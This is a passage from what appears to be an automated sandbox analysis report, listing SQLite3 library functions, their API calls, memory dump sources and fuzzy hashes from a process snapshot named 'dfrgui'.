                                                                                              • Opcode Fuzzy Hash: d762e509f5cb1270798c3d8b0ed4d09417eb475e6e46246839d711bae6bfec28
                                                                                              • Instruction Fuzzy Hash: 7131E6B0E09A66DBCB016F95C94069D7BB0FFC5348F25C419D48297346E735C891DB82
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E254EB Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_log.SQLITE3 ref: 61E25519
                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,61E25634), ref: 61E2552D
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E25634), ref: 61E25555
                                                                                              • sqlite3_log.SQLITE3 ref: 61E25573
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E25634), ref: 61E255A9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_logsqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                              • String ID:
                                                                                              • API String ID: 1015584638-0
                                                                                              • Opcode ID: 5d56031a8bb84752336a9039dd8ba1404a2053eeba999a34ddac633c5ec7c6ae
                                                                                              • Instruction ID: 98e21844386c5f0eb86ad88f7432d10628e26b3a42b8c8f0e090f05616cc53f9
                                                                                              • Opcode Fuzzy Hash: 5d56031a8bb84752336a9039dd8ba1404a2053eeba999a34ddac633c5ec7c6ae
                                                                                              • Instruction Fuzzy Hash: 6631E035605B018BDB009FA8C6A47957BE2EF86318F29C5A9EC44CF35EE734D841CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E32FAB Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E3300B
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E3303E
                                                                                              • sqlite3_str_appendall.SQLITE3 ref: 61E33058
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E33070
                                                                                              • sqlite3_str_appendall.SQLITE3 ref: 61E3307C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_str_appendsqlite3_str_appendall$sqlite3_str_appendf
                                                                                              • String ID:
                                                                                              • API String ID: 3231710329-0
                                                                                              • Opcode ID: e866f743c30b3a94c2121f70096810fb02a0b0b762d4b88d13cd1d54cc961783
                                                                                              • Instruction ID: 30878b403b572a8ddf810af99fc1ca3b1dd9d579f515fb15a79ce77769efa307
                                                                                              • Opcode Fuzzy Hash: e866f743c30b3a94c2121f70096810fb02a0b0b762d4b88d13cd1d54cc961783
                                                                                              • Instruction Fuzzy Hash: F531F4B09057599BC710DFA9C89479EFBF1BF88314F24892DD488AB350D776A942CF41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E4983D Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E49852
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E4985D
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E49916
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E49921
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1477753154-0
                                                                                              • Opcode ID: 355cdd5004a08f0de6b7f785f4f298d2ba23b5528131c60e6c40e3f6fb246cde
                                                                                              • Instruction ID: d0ac7e2d04bc2d04bfb40ff7e431178190c03de74fec9d8161b812fd9134e836
                                                                                              • Opcode Fuzzy Hash: 355cdd5004a08f0de6b7f785f4f298d2ba23b5528131c60e6c40e3f6fb246cde
                                                                                              • Instruction Fuzzy Hash: 08218D74A08756CBD7009FA9D68460ABBE4FFC9718F28C41EEC989B305D774D851CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E38A03 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E38A11
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1913B
                                                                                                • Part of subcall function 61E19104: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E212EB), ref: 61E1916F
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19447
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E38A29
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E38A4C
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E38A90
                                                                                              • sqlite3_memory_used.SQLITE3 ref: 61E38A95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_configsqlite3_initializesqlite3_memory_used
                                                                                              • String ID:
                                                                                              • API String ID: 2853221962-0
                                                                                              • Opcode ID: 031e5a497ec252448d44849d773f94ecd0f541e9952077c52477e4cf24af345f
                                                                                              • Instruction ID: a314d4ed54b9b3ac1784280a8de53b3a92d5c7d9bf62fefd5731d83f770ebcb7
                                                                                              • Opcode Fuzzy Hash: 031e5a497ec252448d44849d773f94ecd0f541e9952077c52477e4cf24af345f
                                                                                              • Instruction Fuzzy Hash: 39114C30B14A168BCF04DFBAC89095E77F1ABCA314B24C62AE854CB340D730E886DB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E0ACE3 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3(?,00000000,?,61E149F2), ref: 61E0AD0D
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,00000000,?,61E149F2), ref: 61E0AD49
                                                                                              • sqlite3_mutex_enter.SQLITE3(?,00000000,?,61E149F2), ref: 61E0AD62
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,00000000,?,61E149F2), ref: 61E0AD75
                                                                                              • sqlite3_free.SQLITE3(?,00000000,?,61E149F2), ref: 61E0AD7D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                              • String ID:
                                                                                              • API String ID: 251237202-0
                                                                                              • Opcode ID: 42394fb5a788f2ca3e192ebcb52894093d141ef73e50f260fe20adf920bb6df6
                                                                                              • Instruction ID: f509928a4a19023eac21ae2a0358e012458144a895d17b4b7f07987d3cad5487
                                                                                              • Opcode Fuzzy Hash: 42394fb5a788f2ca3e192ebcb52894093d141ef73e50f260fe20adf920bb6df6
                                                                                              • Instruction Fuzzy Hash: 3211C2749A4E518FDB00AFBAC5C451D7BF4FB8634AB25483AE488CB301E734D8D08B52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E339EA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 331COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 61E335F6: sqlite3_realloc64.SQLITE3 ref: 61E33549
                                                                                              • sqlite3_free.SQLITE3 ref: 61E33BF6
                                                                                              • sqlite3_log.SQLITE3 ref: 61E33C77
                                                                                                • Part of subcall function 61E093E8: memcmp.MSVCRT ref: 61E09442
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmpsqlite3_freesqlite3_logsqlite3_realloc64
                                                                                              • String ID:
                                                                                              • API String ID: 167025251-3916222277
                                                                                              • Opcode ID: e4541a4aae98f10f1933f3dfe53fa5dd526c0ee65fdc8b9cb79769377ad02908
                                                                                              • Instruction ID: 7674bfe9b48576b57c6ef816fe53343d6f6332591bccf23a4894a5ad7dcd6749
                                                                                              • Opcode Fuzzy Hash: e4541a4aae98f10f1933f3dfe53fa5dd526c0ee65fdc8b9cb79769377ad02908
                                                                                              • Instruction Fuzzy Hash: 7FE1F674E043598BEB14CFA9C884B8DBBF1AF88318F24C56AD819AB396D774D845CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E215AC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 227COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E21628
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E2165C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_str_append
                                                                                              • String ID: $,
                                                                                              • API String ID: 1074250351-71045815
                                                                                              • Opcode ID: 47b8c36697eb14f8ce8678e95ac893dd7be2c16269d00fe839ea99d920a3a8d6
                                                                                              • Instruction ID: 3c2dea6d81359d975d7f89bdf01d43bdb241a07d6012d9c7ff3bf4d08658c843
                                                                                              • Opcode Fuzzy Hash: 47b8c36697eb14f8ce8678e95ac893dd7be2c16269d00fe839ea99d920a3a8d6
                                                                                              • Instruction Fuzzy Hash: B4A178309093958EDB258FA888E0799BBF1AB47348F28C5D9C4989B241D7B6CBC5CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E2E755 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 216COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E2E80B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_text
                                                                                              • String ID: fa
                                                                                              • API String ID: 348685305-2923799766
                                                                                              • Opcode ID: f425bd14ec82053561d2378088be870cf074f4c2bc474f0c8eb4a1ee4b6c29b0
                                                                                              • Instruction ID: 4817ec7f1ccbcd8e0472ce2ec47c2c4c33a5a5dbf8cc4b624f61f2e133349028
                                                                                              • Opcode Fuzzy Hash: f425bd14ec82053561d2378088be870cf074f4c2bc474f0c8eb4a1ee4b6c29b0
                                                                                              • Instruction Fuzzy Hash: 25819270B04A618BEB15CFBAC4A079AB7F6AF89308F2CC55ADC988B345D774D841CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3C211 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 155COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3C3C1
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3C3ED
                                                                                                • Part of subcall function 61E3C1B7: sqlite3_vmprintf.SQLITE3 ref: 61E3C1D0
                                                                                                • Part of subcall function 61E3C1B7: sqlite3_mprintf.SQLITE3 ref: 61E3C1EE
                                                                                                • Part of subcall function 61E3C1B7: sqlite3_free.SQLITE3 ref: 61E3C1FA
                                                                                                • Part of subcall function 61E3C1B7: sqlite3_free.SQLITE3 ref: 61E3C202
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_mprintf$sqlite3_vmprintf
                                                                                              • String ID: AND$NOT
                                                                                              • API String ID: 966554101-2843896482
                                                                                              • Opcode ID: cc0a5b649f9f14e569f10de869a8a79b9b1f2c309e84614b7a9d922d104709f3
                                                                                              • Instruction ID: 882c3518eac2842b7bf6bd924e6adcfee539de101580121091ebd2f01f6b7c70
                                                                                              • Opcode Fuzzy Hash: cc0a5b649f9f14e569f10de869a8a79b9b1f2c309e84614b7a9d922d104709f3
                                                                                              • Instruction Fuzzy Hash: 6C51F6B5B08B729BD7009FA5C58166EBBF1BBC9708F20C82ED5999B340D734D841DB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E2393E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_win32_is_nt
                                                                                              • String ID: winAccess
                                                                                              • API String ID: 2284118020-3605117275
                                                                                              • Opcode ID: e4bedbe59d0e3adca3a19d5c242b48a8c5a6589a95c469b6edaa5f257f68798b
                                                                                              • Instruction ID: 3eded24093e5f9dfbb4e97a052a059c0e2bb0c4d61b901d1e529cbd8f7c23d07
                                                                                              • Opcode Fuzzy Hash: e4bedbe59d0e3adca3a19d5c242b48a8c5a6589a95c469b6edaa5f257f68798b
                                                                                              • Instruction Fuzzy Hash: B6316E71E082498FDB10DEA8C85575EB7B1FB89318F25CA39D8A497384D770D942CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3DAF5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 61E36E74: sqlite3_value_text.SQLITE3 ref: 61E36E8A
                                                                                                • Part of subcall function 61E36E74: sqlite3_value_bytes.SQLITE3 ref: 61E36E97
                                                                                                • Part of subcall function 61E36E74: sqlite3_get_auxdata.SQLITE3 ref: 61E36ED2
                                                                                                • Part of subcall function 61E36E74: memcmp.MSVCRT ref: 61E36EFA
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3DB5C
                                                                                                • Part of subcall function 61E3D9F2: sqlite3_mprintf.SQLITE3 ref: 61E3DA44
                                                                                                • Part of subcall function 61E3D9F2: sqlite3_result_error.SQLITE3 ref: 61E3DA5E
                                                                                                • Part of subcall function 61E3D9F2: sqlite3_free.SQLITE3 ref: 61E3DA66
                                                                                              • sqlite3_result_subtype.SQLITE3 ref: 61E3DC00
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_text$memcmpsqlite3_freesqlite3_get_auxdatasqlite3_mprintfsqlite3_result_errorsqlite3_result_subtypesqlite3_value_bytes
                                                                                              • String ID: J$null
                                                                                              • API String ID: 3173415908-802103870
                                                                                              • Opcode ID: 274a83eaa6338aa8c26de974047efbff8154e50cf941c0775dbd30a6f29113b3
                                                                                              • Instruction ID: 72fdee34559e0c4169eca6004373d7a266cbc1dc99c16a4d690cce68f48a8e01
                                                                                              • Opcode Fuzzy Hash: 274a83eaa6338aa8c26de974047efbff8154e50cf941c0775dbd30a6f29113b3
                                                                                              • Instruction Fuzzy Hash: 39317A74A04269CBDB24DF65C880B8E77B5BFC5318FA0C469E8198B301CB75DA86CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3DD42 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3DD7D
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3DD9D
                                                                                              • sqlite3_result_value.SQLITE3 ref: 61E3DDE5
                                                                                                • Part of subcall function 61E3D74F: sqlite3_mprintf.SQLITE3 ref: 61E3D764
                                                                                                • Part of subcall function 61E3D74F: sqlite3_result_error.SQLITE3 ref: 61E3D77A
                                                                                                • Part of subcall function 61E3D74F: sqlite3_free.SQLITE3 ref: 61E3D782
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
